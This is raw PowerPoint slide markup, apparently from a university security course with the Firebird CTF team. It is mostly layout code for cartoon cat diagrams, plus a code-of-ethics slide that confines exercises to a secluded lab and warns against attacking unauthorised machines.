                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F1C907-7DF9-C8E9-C978-72C9700C7034}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2650332" y="1766066"/>
              <a:ext cx="1093546" cy="701216"/>
              <a:chOff x="2650332" y="1766066"/>
              <a:chExt cx="1093546" cy="701216"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39BA388F-1F77-8FB4-8043-4411CDD634C2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3300535" y="1988071"/>
                <a:ext cx="443343"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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="Picture 37" descr="A cartoon cat pillow with a face&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C807E8E8-C27E-6312-0EDA-02B538358DF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2650332" y="1766066"/>
                <a:ext cx="701216" cy="701216"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="42" name="Group 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F6C6D8-C66B-2A6A-9646-71D20AC2F057}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="693365" y="1933803"/>
              <a:ext cx="1744412" cy="890822"/>
              <a:chOff x="693365" y="1933803"/>
              <a:chExt cx="1744412" cy="890822"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2E8E66-E96D-0A5F-7888-834BD5336B9C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="693365" y="2516848"/>
                <a:ext cx="1744412"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{hand: "knife"}</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Picture 40" descr="A yellow cat with a knife&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC614B07-4A49-598D-FE54-933C89D8DFD0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1274047" y="1933803"/>
                <a:ext cx="583045" cy="583045"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="Group 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BC40AE-20E0-00F9-565D-0191D0891D0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="597330" y="2794949"/>
              <a:ext cx="1979305" cy="1121666"/>
              <a:chOff x="597330" y="2794949"/>
              <a:chExt cx="1979305" cy="1121666"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="TextBox 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE019060-9BD3-9660-58EB-C45392BF2ACF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="597330" y="3608838"/>
                <a:ext cx="1979305"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firebird</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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="47" name="Picture 46" descr="A cartoon cat holding a flower&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770B0852-9FCD-C13A-E79B-5B57F1689059}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1100429" y="2794949"/>
                <a:ext cx="823156" cy="823156"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="Group 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17EDD60-8BA7-1D58-A2F5-41F85CC3A403}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1195909" y="3808186"/>
              <a:ext cx="1241868" cy="1046530"/>
              <a:chOff x="1195909" y="3808186"/>
              <a:chExt cx="1241868" cy="1046530"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAFEB31-5395-831A-9DE5-D494D06F73DC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1195909" y="454693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pic>
            <p:nvPicPr>
              <p:cNvPr id="56" name="Picture 55" descr="A cartoon cat with a heart&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB445E2-FB2F-8153-2504-85E5F664D0FA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1443061" y="3808186"/>
                <a:ext cx="747563" cy="747563"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="Group 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7090343C-8652-1E9A-C184-E46CEAF2217F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3351548" y="3499390"/>
              <a:ext cx="1744412" cy="1064165"/>
              <a:chOff x="3351548" y="3499390"/>
              <a:chExt cx="1744412" cy="1064165"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="TextBox 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7217477-804F-A484-7A70-3F43A596DEB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3351548" y="4255778"/>
                <a:ext cx="1744412"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59" name="Picture 58" descr="A cartoon cat with a magnifying glass&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9131F03F-DC17-4C4B-7004-3C6F1A362EDD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3774858" y="3499390"/>
                <a:ext cx="834449" cy="834449"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675600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sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="571925"/>
            <a:ext cx="7688700" cy="535200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code of ethics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="1321199"/>
            <a:ext cx="7688700" cy="3428651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exercises for the course should be attempted ONLY INSIDE THE SECLUDED LAB ENVIRONMENT documented or provided. Please note that most of the attacks described in the slides would be ILLEGAL if attempted on machines that you do not have explicit permission to test and attack. The university, course lecturer, lab instructors, teaching assistants and the Firebird CTF team assume no responsibility for any actions performed outside the secluded lab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The challenge server should be regarded as a hostile environment. You should not use your real information when attempting challenges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not intentionally disrupt other students who are working on the challenges or disclose private information you found on the challenge server (e.g. IP address of other students). Please let us know if you accidentally broke the challenge. While you may discuss with your friends about the challenges, you must complete all the exercises and homework by yourselves.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8536302" y="4749851"/>
            <a:ext cx="548700" cy="393600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="e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 prototype 2.2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Group 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A3F3900-263B-DABE-82C7-E6232C15F050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="597330" y="1575749"/>
            <a:ext cx="8059243" cy="3278967"/>
            <a:chOff x="597330" y="1575749"/>
            <a:chExt cx="8059243" cy="3278967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Connector: Curved 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB31D0BF-5023-8E4D-95DC-4318ACD43594}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3743878" y="2141960"/>
              <a:ext cx="1734965" cy="8574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6A97910-B0D3-8324-4F62-44703852189A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2437777" y="2670737"/>
              <a:ext cx="3041066" cy="3287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F57D46-5D3F-6333-F2B4-779A1BA5338C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2576635" y="2999457"/>
              <a:ext cx="2902208" cy="7632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8A24C60-C14B-9C18-B35F-DAEFF73129C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="10" idx="3"/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2437777" y="4409667"/>
              <a:ext cx="913771" cy="2911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73DB6A8-B84C-A941-7816-66B67F202273}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5095960" y="2999457"/>
              <a:ext cx="382883" cy="14102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D595C3D-2DDE-0115-491D-8E4A38C694D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="3"/>
              <a:endCxn id="12" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7405884" y="2854617"/>
              <a:ext cx="602045" cy="1448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C985A8D-88BD-6C35-5573-3AEF3A5B0F6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5478843" y="1575749"/>
              <a:ext cx="1927041" cy="1685318"/>
              <a:chOff x="5478843" y="1575749"/>
              <a:chExt cx="1927041" cy="1685318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="TextBox 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3733AF-D4CD-7237-2709-B340E20BFDF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5478843" y="2737847"/>
                <a:ext cx="1927041"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{hand: "knife"}</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="Picture 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33239DE-DC6E-50BD-BD6D-869A2C0F872D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5812611" y="1575749"/>
                <a:ext cx="1219200" cy="1219200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF525AE5-8EDE-870B-E3D6-BFF44C203F0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7914720" y="1995994"/>
              <a:ext cx="741853" cy="1012511"/>
              <a:chOff x="7914720" y="1995994"/>
              <a:chExt cx="741853" cy="1012511"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="TextBox 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FE83C1-5E40-1369-2E84-2048BCC19B96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8007929" y="2700728"/>
                <a:ext cx="64864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pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Picture 34" descr="A yellow cat with black eyes and mouth and nose&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B906F5DB-0647-97E8-55FF-193A716462C5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7914720" y="1995994"/>
                <a:ext cx="741853" cy="741853"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F1C907-7DF9-C8E9-C978-72C9700C7034}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2650332" y="1815370"/>
              <a:ext cx="1093546" cy="602607"/>
              <a:chOff x="2650332" y="1815370"/>
              <a:chExt cx="1093546" cy="602607"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39BA388F-1F77-8FB4-8043-4411CDD634C2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3300535" y="1988071"/>
                <a:ext cx="443343"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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="Picture 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C807E8E8-C27E-6312-0EDA-02B538358DF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2650332" y="1815370"/>
                <a:ext cx="701216" cy="602607"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="42" name="Group 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F6C6D8-C66B-2A6A-9646-71D20AC2F057}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="693365" y="1974798"/>
              <a:ext cx="1744412" cy="849827"/>
              <a:chOff x="693365" y="1974798"/>
              <a:chExt cx="1744412" cy="849827"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2E8E66-E96D-0A5F-7888-834BD5336B9C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="693365" y="2516848"/>
                <a:ext cx="1744412"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{hand: "knife"}</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Picture 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC614B07-4A49-598D-FE54-933C89D8DFD0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1274047" y="1974798"/>
                <a:ext cx="583045" cy="501054"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="Group 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BC40AE-20E0-00F9-565D-0191D0891D0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="597330" y="2852828"/>
              <a:ext cx="1979305" cy="1063787"/>
              <a:chOff x="597330" y="2852828"/>
              <a:chExt cx="1979305" cy="1063787"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="TextBox 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE019060-9BD3-9660-58EB-C45392BF2ACF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="597330" y="3608838"/>
